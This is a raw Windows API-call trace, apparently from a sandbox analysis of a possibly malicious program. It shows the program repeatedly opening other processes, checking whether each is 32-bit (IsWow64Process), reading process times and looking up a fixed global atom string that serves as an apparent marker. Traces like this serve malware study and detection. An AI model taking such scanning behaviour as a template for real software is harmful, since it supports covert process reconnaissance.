	[0141.005] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.005] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.005] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.005] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.005] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.005] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.006] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.006] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.006] CloseHandle (hObject=0x2dc) returned 1
	[0141.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0141.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.006] CloseHandle (hObject=0x2dc) returned 1
	[0141.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0141.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.006] CloseHandle (hObject=0x2dc) returned 1
	[0141.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0141.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.007] CloseHandle (hObject=0x2dc) returned 1
	[0141.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0141.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.007] CloseHandle (hObject=0x2dc) returned 1
	[0141.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0141.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.007] CloseHandle (hObject=0x2dc) returned 1
	[0141.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0141.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0141.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0141.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0141.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0141.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0141.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0141.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0141.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0141.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0141.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0141.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0141.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0141.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0141.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0141.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0141.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0141.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0141.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0141.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.053] CloseHandle (hObject=0x2dc) returned 1
	[0141.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0141.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0141.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0141.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.054] CloseHandle (hObject=0x2dc) returned 1
	[0141.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0141.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0141.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.054] CloseHandle (hObject=0x2dc) returned 1
	[0141.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0141.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.054] CloseHandle (hObject=0x2dc) returned 1
	[0141.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0141.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.055] CloseHandle (hObject=0x2dc) returned 1
	[0141.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0141.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.055] CloseHandle (hObject=0x2dc) returned 1
	[0141.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0141.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.055] CloseHandle (hObject=0x2dc) returned 1
	[0141.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0141.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.055] CloseHandle (hObject=0x2dc) returned 1
	[0141.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0141.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0141.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.056] CloseHandle (hObject=0x2dc) returned 1
	[0141.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0141.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.056] CloseHandle (hObject=0x2dc) returned 1
	[0141.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0141.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.056] CloseHandle (hObject=0x2dc) returned 1
	[0141.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0141.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.057] CloseHandle (hObject=0x2dc) returned 1
	[0141.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0141.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.057] CloseHandle (hObject=0x2dc) returned 1
	[0141.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0141.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.057] CloseHandle (hObject=0x2dc) returned 1
	[0141.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0141.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.058] CloseHandle (hObject=0x2dc) returned 1
	[0141.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0141.058] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.058] CloseHandle (hObject=0x2dc) returned 1
	[0141.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0141.058] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.058] CloseHandle (hObject=0x2dc) returned 1
	[0141.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0141.058] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.058] CloseHandle (hObject=0x2dc) returned 1
	[0141.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0141.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.059] CloseHandle (hObject=0x2dc) returned 1
	[0141.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0141.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.059] CloseHandle (hObject=0x2dc) returned 1
	[0141.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0141.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.059] CloseHandle (hObject=0x2dc) returned 1
	[0141.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0141.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.060] CloseHandle (hObject=0x2dc) returned 1
	[0141.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0141.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.060] CloseHandle (hObject=0x2dc) returned 1
	[0141.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0141.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.060] CloseHandle (hObject=0x2dc) returned 1
	[0141.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0141.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.060] CloseHandle (hObject=0x2dc) returned 1
	[0141.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0141.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.061] CloseHandle (hObject=0x2dc) returned 1
	[0141.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0141.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.061] CloseHandle (hObject=0x2dc) returned 1
	[0141.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0141.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.061] CloseHandle (hObject=0x2dc) returned 1
	[0141.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0141.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.061] CloseHandle (hObject=0x2dc) returned 1
	[0141.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0141.062] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.062] CloseHandle (hObject=0x2dc) returned 1
	[0141.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0141.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.063] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.063] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.063] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.064] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.064] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.064] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.064] CloseHandle (hObject=0x2dc) returned 1
	[0141.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0141.064] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.064] CloseHandle (hObject=0x2dc) returned 1
	[0141.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0141.064] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.065] CloseHandle (hObject=0x2dc) returned 1
	[0141.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0141.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.065] CloseHandle (hObject=0x2dc) returned 1
	[0141.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0141.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.065] CloseHandle (hObject=0x2dc) returned 1
	[0141.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0141.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.065] CloseHandle (hObject=0x2dc) returned 1
	[0141.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.100] CloseHandle (hObject=0x2dc) returned 1
	[0141.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.100] CloseHandle (hObject=0x2dc) returned 1
	[0141.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.100] CloseHandle (hObject=0x2dc) returned 1
	[0141.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.101] CloseHandle (hObject=0x2dc) returned 1
	[0141.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.101] CloseHandle (hObject=0x2dc) returned 1
	[0141.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.101] CloseHandle (hObject=0x2dc) returned 1
	[0141.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.102] CloseHandle (hObject=0x2dc) returned 1
	[0141.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.102] CloseHandle (hObject=0x2dc) returned 1
	[0141.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.102] CloseHandle (hObject=0x2dc) returned 1
	[0141.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.103] CloseHandle (hObject=0x2dc) returned 1
	[0141.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.103] CloseHandle (hObject=0x2dc) returned 1
	[0141.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.103] CloseHandle (hObject=0x2dc) returned 1
	[0141.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.103] CloseHandle (hObject=0x2dc) returned 1
	[0141.104] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.104] CloseHandle (hObject=0x2dc) returned 1
	[0141.104] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.104] CloseHandle (hObject=0x2dc) returned 1
	[0141.104] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.104] CloseHandle (hObject=0x2dc) returned 1
	[0141.104] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.104] CloseHandle (hObject=0x2dc) returned 1
	[0141.104] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.105] CloseHandle (hObject=0x2dc) returned 1
	[0141.105] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.105] CloseHandle (hObject=0x2dc) returned 1
	[0141.105] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.105] CloseHandle (hObject=0x2dc) returned 1
	[0141.105] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.105] CloseHandle (hObject=0x2dc) returned 1
	[0141.105] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.112] CloseHandle (hObject=0x2dc) returned 1
	[0141.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.113] CloseHandle (hObject=0x2dc) returned 1
	[0141.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.113] CloseHandle (hObject=0x2dc) returned 1
	[0141.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.113] CloseHandle (hObject=0x2dc) returned 1
	[0141.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.114] CloseHandle (hObject=0x2dc) returned 1
	[0141.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.114] CloseHandle (hObject=0x2dc) returned 1
	[0141.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.114] CloseHandle (hObject=0x2dc) returned 1
	[0141.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.115] CloseHandle (hObject=0x2dc) returned 1
	[0141.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.115] CloseHandle (hObject=0x2dc) returned 1
	[0141.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.116] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.116] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.116] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.117] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.117] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.117] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.117] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.117] CloseHandle (hObject=0x2dc) returned 1
	[0141.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.118] CloseHandle (hObject=0x2dc) returned 1
	[0141.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.118] CloseHandle (hObject=0x2dc) returned 1
	[0141.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.118] CloseHandle (hObject=0x2dc) returned 1
	[0141.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.118] CloseHandle (hObject=0x2dc) returned 1
	[0141.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.119] CloseHandle (hObject=0x2dc) returned 1
	[0141.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.154] CloseHandle (hObject=0x2dc) returned 1
	[0141.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.154] CloseHandle (hObject=0x2dc) returned 1
	[0141.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.154] CloseHandle (hObject=0x2dc) returned 1
	[0141.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.155] CloseHandle (hObject=0x2dc) returned 1
	[0141.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.155] CloseHandle (hObject=0x2dc) returned 1
	[0141.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.155] CloseHandle (hObject=0x2dc) returned 1
	[0141.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.155] CloseHandle (hObject=0x2dc) returned 1
	[0141.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.156] CloseHandle (hObject=0x2dc) returned 1
	[0141.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.156] CloseHandle (hObject=0x2dc) returned 1
	[0141.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.156] CloseHandle (hObject=0x2dc) returned 1
	[0141.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.156] CloseHandle (hObject=0x2dc) returned 1
	[0141.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.157] CloseHandle (hObject=0x2dc) returned 1
	[0141.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.157] CloseHandle (hObject=0x2dc) returned 1
	[0141.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.157] CloseHandle (hObject=0x2dc) returned 1
	[0141.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.157] CloseHandle (hObject=0x2dc) returned 1
	[0141.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.158] CloseHandle (hObject=0x2dc) returned 1
	[0141.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.158] CloseHandle (hObject=0x2dc) returned 1
	[0141.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.158] CloseHandle (hObject=0x2dc) returned 1
	[0141.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.158] CloseHandle (hObject=0x2dc) returned 1
	[0141.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.159] CloseHandle (hObject=0x2dc) returned 1
	[0141.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.159] CloseHandle (hObject=0x2dc) returned 1
	[0141.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.159] CloseHandle (hObject=0x2dc) returned 1
	[0141.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.159] CloseHandle (hObject=0x2dc) returned 1
	[0141.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.160] CloseHandle (hObject=0x2dc) returned 1
	[0141.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.160] CloseHandle (hObject=0x2dc) returned 1
	[0141.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.160] CloseHandle (hObject=0x2dc) returned 1
	[0141.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.160] CloseHandle (hObject=0x2dc) returned 1
